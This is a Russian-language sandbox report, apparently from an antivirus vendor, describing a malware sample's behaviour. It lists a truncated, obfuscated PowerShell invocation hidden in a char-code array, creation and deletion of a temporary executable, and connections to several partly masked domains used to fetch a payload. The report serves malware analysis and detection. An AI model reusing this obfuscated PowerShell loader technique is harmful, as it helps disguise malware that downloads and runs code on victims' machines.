Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' . ( $Env:coMsPEc[4,24,25]-JoIN'') ( "$(SV 'oFs' '' ) " +[STRing]((13 , 102,93,66 ,20 , 71 ,76 ,94,4, 70, 75,67 ,76,74, 93,9,103, 76 ,93, 7,126 ,76 , 75 ,106 ,69 ,64 ,76 , 71 ,93,18 ,13 , 113 ,...
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\75.exe
Удаляет следующие файлы
- %TEMP%\75.exe
Сетевая активность
Подключается к
- 'st####guardians.com':80
- 'ch##rs.com':80
TCP
Запросы HTTP GET
- http://www.st####guardians.com/eD5DAmA9/
UDP
- DNS ASK st####guardians.com
- DNS ASK st####ndcouver.com
- DNS ASK in#####d-liberty.com
- DNS ASK ch##rs.com
- DNS ASK da##eds.com
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' . ( $Env:coMsPEc[4,24,25]-JoIN'') ( "$(SV 'oFs' '' ) " +[STRing]((13 , 102,93,66 ,20 , 71 ,76 ,94,4, 70, 75,67 ,76,74, 93,9,103, 76 ,93, 7,126 ,76 , 75 ,106 ,69 ,64 ,76 , 71 ,93,18 ,13 , 113 ,...' (со скрытым окном)
